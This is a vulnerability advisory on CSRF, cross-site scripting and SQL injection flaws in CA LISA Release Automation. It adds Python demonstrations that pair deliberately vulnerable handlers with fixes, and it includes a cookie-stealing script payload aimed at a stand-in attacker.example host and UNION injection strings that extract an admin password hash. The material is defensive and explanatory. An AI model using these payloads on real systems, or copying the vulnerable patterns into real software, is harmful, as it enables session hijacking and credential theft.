Vulnerability Note VU#343060
CA LISA Release Automation contains multiple vulnerabilities
Original Release date: 15 Dec 2014 | Last revised: 17 Dec 2014
CA LISA Release Automation (builds prior to the b448 hotfix) contains multiple vulnerabilities.
CWE-352: Cross-Site Request Forgery (CSRF) – CVE-2014-8246
CA LISA Release Automation (builds prior to the b448 hotfix) contains a site-wide (global) Cross-Site Request Forgery (CSRF) vulnerability: the application does not verify that state-changing requests were intentionally submitted by the user. An attacker who lures a logged-in user to a malicious page can therefore perform actions on the site with the same permissions as that user. Exploitation requires the victim to be authenticated to the application with an active session.
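The following is an added illustration, not code from CA Release Automation or from the advisory. It models a generic web application with a hypothetical "delete environment" endpoint: the unprotected handler trusts the session cookie alone, so a request forged from another origin succeeds, while the hardened handler applies the synchronizer-token pattern (a per-session secret that the attacker's page cannot read) and rejects requests whose Origin header names a foreign site. The session store, endpoint, cookie name and origins are all constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed in-memory session store: session id -> {"user": ..., "csrf": ...}.
# This stands in for the application's real session handling, which is not known here.
SESSIONS: Dict[str, Dict[str, str]] = {}
APP_ORIGIN = "https://ra.example.internal"   # assumed deployment origin


def login(user: str) -> str:
    """Create a session and bind a fresh anti-CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


@dataclass
class Request:
    method: str
    cookies: Dict[str, str]
    form: Dict[str, str]
    origin: Optional[str] = None   # Origin header as sent by the browser, if any


def delete_environment_unprotected(req: Request) -> str:
    """Vulnerable pattern: authorization is decided by the cookie alone, so any page
    the victim visits can submit this form and the browser attaches the cookie."""
    sess = SESSIONS.get(req.cookies.get("JSESSIONID", ""))
    if sess is None:
        return "401 unauthenticated"
    return f"200 deleted {req.form['env']} as {sess['user']}"


def delete_environment_protected(req: Request) -> str:
    """Hardened pattern: state changes must be POST, must come from our own origin
    (when the browser says where they came from), and must carry the session's token."""
    sess = SESSIONS.get(req.cookies.get("JSESSIONID", ""))
    if sess is None:
        return "401 unauthenticated"
    if req.method != "POST":
        return "405 state change must be POST"
    if req.origin is not None and req.origin != APP_ORIGIN:
        return "403 cross-origin request"
    supplied = req.form.get("csrf_token", "")
    # Constant-time compare so the token cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(supplied, sess["csrf"]):
        return "403 missing or invalid CSRF token"
    return f"200 deleted {req.form['env']} as {sess['user']}"


def forged_request(sid: str) -> Request:
    """What the victim's browser sends after loading the attacker's auto-submitting form:
    the session cookie rides along automatically, but the token is unknown to the attacker."""
    return Request("POST", {"JSESSIONID": sid}, {"env": "prod"},
                   origin="https://attacker.example")


def legitimate_request(sid: str) -> Request:
    """A request from the application's own page, which embeds the session's token."""
    return Request("POST", {"JSESSIONID": sid},
                   {"env": "prod", "csrf_token": SESSIONS[sid]["csrf"]},
                   origin=APP_ORIGIN)


if __name__ == "__main__":
    sid = login("alice")
    print("unprotected, forged:", delete_environment_unprotected(forged_request(sid)))
    print("protected, forged:  ", delete_environment_protected(forged_request(sid)))
    print("protected, genuine: ", delete_environment_protected(legitimate_request(sid)))
```

The Origin check is a second line of defence only: older browsers may omit the header, which is why the token check is unconditional.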
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – CVE-2014-8247
CA Release Automation (builds prior to the b448 hotfix) contains a site-wide (global) cross-site scripting (XSS) vulnerability in the server exception message: the message is rendered into the page without being neutralized, so an attacker who can influence its contents can inject script into the response.
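An added example of the pattern behind an XSS in an exception message, not code from CA Release Automation or the advisory. The parameter parser, error page and payload are constructed; the point is that error paths often echo the offending input, so the exception handler is itself an output sink that needs encoding.

```python
import html

# Constructed: a request parameter validator that, like many frameworks, reports the
# rejected value inside the exception message.
def parse_page_size(raw: str) -> int:
    try:
        n = int(raw)
    except ValueError:
        raise ValueError(f"invalid page size: {raw!r}") from None
    if n <= 0:
        raise ValueError(f"invalid page size: {raw!r}")
    return n


def render_error_vulnerable(exc: Exception) -> str:
    """Sink: the exception text, which contains attacker input, lands in HTML unencoded."""
    return f"<div class='error'>Server error: {exc}</div>"


def render_error_escaped(exc: Exception) -> str:
    """Fix: HTML-encode the message at the point where it enters the HTML context."""
    return f"<div class='error'>Server error: {html.escape(str(exc))}</div>"


def handle(raw_page_size: str, render_error) -> str:
    """Request handler: the success path is static, the failure path reflects input."""
    try:
        return f"<p>{parse_page_size(raw_page_size)} rows per page</p>"
    except ValueError as exc:
        return render_error(exc)


# Constructed payload: a reflected value that exfiltrates the session cookie.
PAYLOAD = "<script>location='https://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    print(handle("25", render_error_escaped))
    print(handle(PAYLOAD, render_error_vulnerable))
    print(handle(PAYLOAD, render_error_escaped))
```

A stronger fix is to not echo raw input in exception messages at all and to log it server-side instead; the encoding step is still required because other exceptions may carry user-controlled text.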
CWE-89: Improper Neutralization of Special Elements used in a SQL Command (‘SQL Injection’) – CVE-2014-8248
CA Release Automation (builds prior to the b448 hotfix) contains a SQL injection vulnerability in the filter and parent parameters. An authenticated attacker may use it to read the administrator user's password hash from the database and so elevate privileges.
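An added, self-contained demonstration of the injection shape the advisory describes, not the product's real queries or schema. It builds a constructed SQLite database with a users table (holding placeholder hashes) and an environments table, then shows a query that concatenates the filter and parent parameters into SQL and how each parameter can be used to UNION the administrator's hash into the result, beside the parameterized version where the same inputs return nothing or are rejected. Table and column names are assumptions.

```python
import sqlite3
from typing import List


def build_db() -> sqlite3.Connection:
    """Constructed sample schema and data; the real product's tables are not known."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'superuser', 'sha256$c0ffee-constructed-admin-hash', 'admin');
        INSERT INTO users VALUES (2, 'alice',     'sha256$deadbeef-constructed-user-hash', 'operator');
        CREATE TABLE environments(id INTEGER PRIMARY KEY, name TEXT, parent INTEGER);
        INSERT INTO environments VALUES (1, 'prod',    NULL);
        INSERT INTO environments VALUES (2, 'prod-eu', 1);
        INSERT INTO environments VALUES (3, 'staging', NULL);
    """)
    return conn


def list_environments_vulnerable(conn: sqlite3.Connection, filter_text: str, parent: str) -> List[str]:
    """Vulnerable pattern: both parameters are spliced into the SQL text.
    `filter` sits inside a quoted LIKE pattern; `parent` is unquoted (numeric context)."""
    sql = ("SELECT name FROM environments WHERE name LIKE '%" + filter_text + "%' "
           "AND parent = " + parent)
    return [row[0] for row in conn.execute(sql)]


def list_environments_parameterized(conn: sqlite3.Connection, filter_text: str, parent: str) -> List[str]:
    """Fix: bind values instead of splicing them, and type-check the numeric parameter."""
    try:
        parent_id = int(parent)
    except ValueError:
        raise ValueError("parent must be an integer id") from None
    sql = "SELECT name FROM environments WHERE name LIKE ? AND parent = ?"
    return [row[0] for row in conn.execute(sql, ("%" + filter_text + "%", parent_id))]


# Injection via the quoted `filter` parameter: close the string, UNION in the hash,
# then comment out the rest of the original query.
FILTER_PAYLOAD = "x' UNION SELECT password_hash FROM users WHERE role='admin' -- "

# Injection via the unquoted `parent` parameter: no quote-breaking needed at all.
PARENT_PAYLOAD = "1 UNION SELECT password_hash FROM users WHERE role='admin'"

ADMIN_HASH = "sha256$c0ffee-constructed-admin-hash"


if __name__ == "__main__":
    db = build_db()
    print("legit:         ", list_environments_vulnerable(db, "prod", "1"))
    print("filter inject: ", list_environments_vulnerable(db, FILTER_PAYLOAD, "1"))
    print("parent inject: ", list_environments_vulnerable(db, "prod", PARENT_PAYLOAD))
    print("parameterized: ", list_environments_parameterized(db, FILTER_PAYLOAD, "1"))
```

The hash is recovered through a UNION because both queries return a single text column; with a different column count the attacker pads with NULLs, and where results are not displayed the same parameters are usable for blind extraction. Parameterization removes the whole class rather than the one payload.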
Note: the CVSS score reflects CVE-2014-8246
A remote attacker (unauthenticated for the XSS and CSRF issues; authenticated for the SQL injection) may be able to execute arbitrary script in the context of the end user's browser session (CVE-2014-8247), elevate privileges by extracting the administrator's password hash (CVE-2014-8248), or perform actions on behalf of an authenticated user (CVE-2014-8246).
Apply an Update
CA has released a hotfix, b448, which addresses all of the listed vulnerabilities. See CA's security notice for details and download instructions.
Vendor Information

Vendor: CA Technologies
Status: Affected
Date Notified: 23 Oct 2014
Date Updated: 17 Dec 2014

CVSS Metrics
Thanks to Julian Horoszkiewicz and Lukasz Plonka for reporting these vulnerabilities.
This document was written by Chris King.
Date First Published: 15 Dec 2014
Date Last Updated: 17 Dec 2014